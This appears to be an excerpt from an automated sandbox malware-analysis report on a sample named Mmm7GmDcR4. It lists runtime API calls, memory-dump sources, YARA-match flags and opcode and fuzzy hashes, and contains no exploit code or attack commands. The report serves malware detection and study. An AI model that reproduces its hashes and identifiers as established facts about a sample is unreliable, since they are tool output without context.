                                                                                                • Instruction Fuzzy Hash: DD018C71980309EFDB16EFA4C440BDCBBB3BF48725F10802AD405AB240CBB99544CF90
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040591C
                                                                                                  • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
                                                                                                • __Getcoll.LIBCPMT ref: 00405976
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                • String ID:
                                                                                                • API String ID: 1836011271-0
                                                                                                • Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                • Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
                                                                                                • Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                • Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99
                                                                                                APIs
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0214C160
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0214C170
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0214C180
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0214C194
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Compare_exchange_acquire_4std::_
                                                                                                • String ID:
                                                                                                • API String ID: 3973403980-0
                                                                                                • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                • Instruction ID: b1bd8f68009fe993b286d7774bf7da8b9994e678d6eabf44c30c5536e48cfbeb
                                                                                                • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                • Instruction Fuzzy Hash: ED01BB7A586149FBCF129F54DD018AE3B66AB55754F488423F92C84070DF32C671EBD1
                                                                                                APIs
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Compare_exchange_acquire_4std::_
                                                                                                • String ID:
                                                                                                • API String ID: 3973403980-0
                                                                                                • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                • Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
                                                                                                • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                • Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89
                                                                                                APIs
                                                                                                • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0214377C
                                                                                                  • Part of subcall function 02142B06: ___crtGetTimeFormatEx.LIBCMT ref: 02142B1C
                                                                                                  • Part of subcall function 02142B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02142B3B
                                                                                                • GetLastError.KERNEL32 ref: 02143798
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021437AE
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021437BC
                                                                                                  • Part of subcall function 021428DC: SetThreadPriority.KERNEL32(?,?), ref: 021428E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                • String ID:
                                                                                                • API String ID: 1674182817-0
                                                                                                • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                • Instruction ID: 247fd6412e36191a323ce182a8e0f65f7de045bf4348d832b426e4e9151d696b
                                                                                                • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                • Instruction Fuzzy Hash: 4CF0A7B25803157DE720B7755C0AFBB369C9F01751F600966BD5DE7080EFA9D4448AB4
                                                                                                APIs
                                                                                                • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02141332
                                                                                                  • Part of subcall function 02140BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02140BC6
                                                                                                  • Part of subcall function 02140BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02140BE7
                                                                                                • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02141345
                                                                                                • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02141351
                                                                                                • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0214135A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                • String ID:
                                                                                                • API String ID: 4284812201-0
                                                                                                • Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                • Instruction ID: 0cae64a5e61383a6bd2998744ac8c612241246e0e62002afd561a0249d4bf377
                                                                                                • Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                • Instruction Fuzzy Hash: 31F024716C03087F9F28BBB548105BE22974F84334B040168DA1D9B7C0DF719D41DA98
                                                                                                APIs
                                                                                                • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB
                                                                                                  • Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
                                                                                                  • Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980
                                                                                                • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
                                                                                                • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
                                                                                                • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                • String ID:
                                                                                                • API String ID: 4284812201-0
                                                                                                • Opcode ID: f117573b304a0253e5eb3ceba946981c1d2f141e8d0ac7579789046fb68a8ac4
                                                                                                • Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
                                                                                                • Opcode Fuzzy Hash: f117573b304a0253e5eb3ceba946981c1d2f141e8d0ac7579789046fb68a8ac4
                                                                                                • Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D
                                                                                                APIs
                                                                                                • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515
                                                                                                  • Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
                                                                                                  • Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4
                                                                                                • GetLastError.KERNEL32 ref: 00413531
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00413555
                                                                                                  • Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                • String ID:
                                                                                                • API String ID: 1674182817-0
                                                                                                • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                • Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
                                                                                                • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                • Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0214D078
                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0214D09C
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0214D0AF
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0214D0BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID:
                                                                                                • API String ID: 3657713681-0
                                                                                                • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                • Instruction ID: 708788fc7340aae2ae1fd160e0061ffcf096dda44f8dcc02549c269ca25962cb
                                                                                                • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                • Instruction Fuzzy Hash: 76F05931A80204ABCB24FA50F840C5EB37B9FD1B14721817AD81D13281DF31B90ACB92
                                                                                                APIs
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 02135A79
                                                                                                • __Cnd_signal.LIBCPMT ref: 02135A85
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 02135A9A
                                                                                                • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02135AA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                • String ID:
                                                                                                • API String ID: 2059591211-0
                                                                                                • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                • Instruction ID: 59db209961beeceb6c7b5f58cc31ab2d24bfeb9b8f4bec89028b1dea2cab0fce
                                                                                                • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                • Instruction Fuzzy Hash: A2F0A032480701AFEB327B31D80575A7BA3AF00B35F144418D189568A0CF7AE8555E65
                                                                                                APIs
                                                                                                • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 0214285F
                                                                                                • GetLastError.KERNEL32(?,?,?,?,02148820,?,?,?,?,00000000,?,00000000), ref: 0214286E
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02142884
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02142892
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                • String ID:
                                                                                                • API String ID: 3803302727-0
                                                                                                • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                • Instruction ID: cec2a891c5d0db7af372973991ab8f3d962f9d5b269bd2a9aa68945aa3e2f8af
                                                                                                • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                • Instruction Fuzzy Hash: 1AF0E53454020AFBCF10EFA5CD44EAF37B8AB00B01F600660B919E20E0DB74D6449BA4
                                                                                                APIs
                                                                                                • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
                                                                                                • GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041262B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                • String ID:
                                                                                                • API String ID: 3803302727-0
                                                                                                • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                • Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
                                                                                                • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                • Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C
                                                                                                APIs
                                                                                                • ___crtCreateEventExW.LIBCPMT ref: 02142583
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,02140D90), ref: 02142591
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021425A7
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021425B5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                • String ID:
                                                                                                • API String ID: 200240550-0
                                                                                                • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                • Instruction ID: 15381022d8f2651132fa8b111a9ea3631269aa90fdde25e409db42c575b0a89e
                                                                                                • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                • Instruction Fuzzy Hash: D4E0DF61A803192EEB10B7758C22FBB369C9B00B45F940861BD28EA0C2FFA8D54049A8
                                                                                                APIs
                                                                                                • ___crtCreateEventExW.LIBCPMT ref: 0041231C
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041234E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                • String ID:
                                                                                                • API String ID: 200240550-0
                                                                                                • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                • Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
                                                                                                • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                • Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC
                                                                                                APIs
                                                                                                  • Part of subcall function 02142949: TlsAlloc.KERNEL32(?,02140D90), ref: 0214294F
                                                                                                • TlsAlloc.KERNEL32(?,02140D90), ref: 02153BD6
                                                                                                • GetLastError.KERNEL32 ref: 02153BE8
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02153BFE
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02153C0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3735082963-0
                                                                                                • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                • Instruction ID: d2f7ac694203cf85e475ec2d63bc90713924670ccccdd50a710aaf62b7a269ca
                                                                                                • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                • Instruction Fuzzy Hash: 59E02230480221EEC314BBB69C48A6A3268AB00745B500EB6EC3AE30A0EF34D0444E6C
                                                                                                APIs
                                                                                                  • Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                • TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
                                                                                                • GetLastError.KERNEL32 ref: 00423981
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004239A5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3735082963-0
                                                                                                • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                • Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
                                                                                                • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                • Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C
                                                                                                APIs
                                                                                                • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02140D90), ref: 0214278E
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02140D90), ref: 0214279D
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021427B3
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021427C1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3016159387-0
                                                                                                • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                • Instruction ID: 4926695fa35da277c23db6b414549242e6ff55140bbbd80c69413fc584c273d5
                                                                                                • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                • Instruction Fuzzy Hash: D3E0867464020AABCB10FFB5DD49EAF73BC6B00B06BA00465B919E3150EF78D7488B79
                                                                                                APIs
                                                                                                • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041255A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3016159387-0
                                                                                                • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                • Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
                                                                                                • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                • Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D
                                                                                                APIs
                                                                                                • SetThreadPriority.KERNEL32(?,?), ref: 021428E8
                                                                                                • GetLastError.KERNEL32 ref: 021428F4
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0214290A
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02142918
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                • String ID:
                                                                                                • API String ID: 4286982218-0
                                                                                                • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                • Instruction ID: 3c87115e6a5fcd1957678644539b2f4bf31c8654108a06a237d3fc7d738ed533
                                                                                                • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                • Instruction Fuzzy Hash: 43E0863414021AABDB14BF61CC05FBF37ACAB00745B500825BD2DE10A0EF39D1449A58
                                                                                                APIs
                                                                                                • TlsSetValue.KERNEL32(?,00000000,02147BC8,00000000,?,?,02140D90,?,?,?,00000000,?,00000000), ref: 021429AE
                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021429BA
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021429D0
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021429DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                • String ID:
                                                                                                • API String ID: 1964976909-0
                                                                                                • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                • Instruction ID: 445bf4eca4d5cd3767d5a7dda0733ffe084a3c035b0a4868f94d1f1954837a38
                                                                                                • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                • Instruction Fuzzy Hash: E6E08634140119ABDB10BF61CC08BBF3B6DAF00745B900825BD1DE20A0DF39D1548AA8
                                                                                                APIs
                                                                                                • SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                • GetLastError.KERNEL32 ref: 0041268D
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004126B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                • String ID:
                                                                                                • API String ID: 4286982218-0
                                                                                                • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                • Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
                                                                                                • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                • Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC
                                                                                                APIs
